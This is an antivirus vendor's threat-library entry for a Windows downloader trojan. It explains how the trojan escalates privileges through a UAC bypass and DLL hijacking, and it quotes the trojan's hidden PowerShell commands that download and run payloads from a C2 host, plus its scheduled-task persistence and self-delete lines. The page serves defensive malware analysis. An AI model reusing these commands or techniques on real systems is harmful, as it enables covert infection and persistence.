FOR CUSTOMERS

Close

Library
My library

+ Add to library

Search
Search

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

A query form

Call us

+7 (495) 789-45-86

Forum

Your tickets

New ticket

Call us

+7 (495) 789-45-86

Profile

EN

RU CN DE EN ES FR IT JP KZ UZ PL BY ID
Close
Support services
Scanners
Dr.Web vxCube
Trial
VCI investigations
Virus library
Knowledge base

Technologies

Terminology

Training and education

Myths

News

Trojan.DownLoader48.61444

Added to the Dr.Web virus database: 2025-08-25

Virus description added:

SHA1 hash:

  • 752cbf3b0a18831b1ee02c8850517c695ddda98e

Description

A malicious app written in the C++ programming language and operating on computers running Microsoft Windows. It downloads and runs the Trojan.DownLoader48.54318 downloader trojan on target devices.

Operating routine

When launched, Trojan.DownLoader48.61444 checks for administrator privileges, using the functions AllocateAndInitializeSid and CheckTokenMembership.

#drweb

Checking whether administrator rights are available

If administrator rights are not available, the trojan tries to obtain them and then proceeds to execute its main functionality, downloading the Trojan.DownLoader48.54318 malware into the system. The key strings in the privilege elevation method are decrypted with a custom AES algorithm and decrypted in real time.

Actions performed without administrator rights

Initially, Trojan.DownLoader48.61444 decrypts the bytecode that is later used to patch a copy of the system library %SystemRoot%\System32\ATL.dll.

The trojan bypasses system protection by disguising itself as a legitimate process (it uses the Masquerade PEB technique). For this, it substitutes the name of its current process with the value %SystemRoot%\explorer.exe in the field ImagePathName inside the PEB data structure.

Next, it reads the contents of the library %SystemRoot%\System32\ATL.dll, dynamically locates the function DllEntryPoint in it, and replaces the contents of the entry point with the bytes that were previously decrypted.

#drweb

Changing the contents of the entry point in the system library ATL.dll

In addition to the bytecode, the current path to the trojan is passed to the library, and later on, the trojan will be launched with elevated privileges via the function CreateProcessW.

#drweb

The current path to the Trojan.DownLoader48.61444; along with the bytecode, it is passed to the modified library

The modified library ATL.dll is saved as a file named dropper in the same directory where Trojan.DownLoader48.61444 is located.

Next, via the function SHCreateItemFromParsingName, Trojan.DownLoader48.61444 sequentially initializes the COM model objects of the Windows Shell for %SystemRoot%\System32\wbem and for the created library dropper.

If the initialization is successful, Trojan.DownLoader48.61444 tries to obtain administrator rights by using the CMSTPLUA COM interface. The point is that some old COM interfaces are designed to automatically run with elevated privileges (as administrator) without showing the UAC (User Account Control) request to the user. The trojan calls the function CoGetObject with the parameter Elevation:Administator!new:{3AD05575-8857-4850-9277-11B85BDB8E09}. If successful, the modified library dropper is copied to the directory %SystemRoot%\System32\wbem as the file ATL.dll.

After that, via the function ShellExecuteW, Trojan.DownLoader48.61444 launches Windows Management Instrumentation WmiMgmt.msc. As a result, a DLL Search Order Hijacking vulnerability is exploited in the system app mmc.exe, which then loads the library %SystemRoot%\System32\wbem\ATL.dll. Following this, the original Trojan.DownLoader48.61444 file is executed again—this time with administrator rights.

Ultimately, the modified file %SystemRoot%\System32\wbem\ATL.dll is deleted.

Actions performed with administrator rights

When launched with administrator privileges, Trojan.DownLoader48.61444 runs several PowerShell scripts, which are responsible for downloading the payload from the C2 server and also for its subsequent launch.

An example of the PowerShell script for downloading the payload in the archive one.zip from the address hxxps[:]//down[.]temp-xy[.]com/zip/one[.]zip: 

  powershell -NoProfile -WindowStyle Hidden -Command "New-Item -ItemType Directory -Path '%LOCALAPPDATA%\Microsoft\OneDrive\ListSync\Common\settings' -Force;Invoke-WebRequest -Uri 'hxxps[:]//down[.]temp-xy[.]com/zip/one[.]zip' -OutFile '%TEMP%\one.zip' -UseBasicParsing;Expand-Archive -Path '%TEMP%\one.zip' -DestinationPath '%LOCALAPPDATA%\Microsoft\OneDrive\ListSync\Common\settings' -Force;Remove-Item -Path '%TEMP%\one.zip' -Force

The archive one.zip contains the following files:

  • OneDrivePatcher.exe — a legitimate app from the Windows OS with a valid digital signature;
  • CertificateIn.dat — a Microsoft Corporation certificate;
  • UpdateRingSettings.dllTrojan.DownLoader48.54318 (its file name is the same name as the legitimate library that is part of OneDrive software).

The archive contents are extracted to %LOCALAPPDATA%\Microsoft\OneDrive\ListSync\Common\settings, and the archive itself is deleted.

In the System Scheduler, a task is created to run the extracted file OneDrivePatcher.exe: 

  schtasks /Create /TN "Microsoft\Windows\Live\Roaming\MicrosoftOfficeServiceUpdate" /TR "%LOCALAPPDATA%\Microsoft\OneDrive\ListSync\Common\settings\OneDrivePatcher.exe" /SC ONSTART /DELAY 0005:00 /RL HIGHEST /F

Moreover, this file is launched via a PowerShell script: 

  powershell -NoProfile -WindowStyle Hidden -Command "Start-Sleep -Seconds 6;"$path=\"%LOCALAPPDATA%\Microsoft\OneDrive\ListSync\Common\settings\";$exe=\"$path\OneDrivePatcher.exe\";while (-not (Test-Path $exe)) { Start-Sleep -Seconds 1 };Set-ScheduledTask -TaskName 'Microsoft\Windows\Live\Roaming\MicrosoftOfficeServiceUpdate' -Action (New-ScheduledTaskAction -Execute $exe -WorkingDirectory $path)

When OneDrivePatcher.exe is launched, the DLL Search Order Hijacking vulnerability in it is exploited, and the trojan library UpdateRingSettings.dll is loaded.

An example of the PowerShell script for downloading the payload in the archive two.zip from the address hxxps[:]//down[.]temp-xy[.]com/zip/two[.]zip: 

  powershell -NoProfile -WindowStyle Hidden -Command "New-Item -ItemType Directory -Path '%LOCALAPPDATA%\Microsoft\PlayReady' -Force;Invoke-WebRequest -Uri 'https://down.temp-xy.com/zip/two.zip' -OutFile '%TEMP%\two.zip' -UseBasicParsing;Expand-Archive -Path '%TEMP%\two.zip' -DestinationPath '%LOCALAPPDATA%\Microsoft\PlayReady' -Force;Remove-Item -Path '%TEMP%\two.zip' -Force

The archive two.zip contains the following files;

  • Guardian.exe — the renamed console Python language interpreter pythonw.exe;
  • update.py — the malicious script Python.Downloader.208.

The contents of the archive are extracted to %LOCALAPPDATA%\Microsoft\PlayReady, and the archive is then deleted.

A System Scheduler task is created to run the unpacked Guardian.exe file: 

  schtasks /Create /TN "Microsoft\Windows\DirectX\DirectXServiceUpdater" /TR "%LOCALAPPDATA%\Microsoft\PlayReady\Guardian.exe" /SC ONSTART /DELAY 0020:00 /RL HIGHEST /F

Moreover, a PowerShell script is used to run the script update.py: 

  powershell -NoProfile -WindowStyle Hidden -Command "Start-Sleep -Seconds 6;"$path=\"%LOCALAPPDATA%\Microsoft\PlayReady\";$exe=\"$path\Guardian.exe\";while (-not (Test-Path $exe)) { Start-Sleep -Seconds 1 };Set-ScheduledTask -TaskName 'Microsoft\Windows\DirectX\DirectXServiceUpdater' -Action (New-ScheduledTaskAction -Execute $exe -Argument 'update.py' -WorkingDirectory $path)

After all of the actions are completed, a command containing ping is executed in the command interpreter cmd.exe to create a delay and then delete the original Trojan.DownLoader48.61444 file: 

  cmd /C ping 127.0.0.1 -n 4 >nul && del /f /q "C:\file\9e7173cead96812ec53c75b90918c6ebfc201f4690f8503996d7fa9b28f28793

More details about Trojan.DownLoader48.54318
More details about Python.Downloader.208

News about the trojan

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Free trial

 

Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

Free trial

 

Download Dr.Web

Download by serial number

Download on App Store

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

 

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android

Free trial

14 days

Download now
Get it on Google Play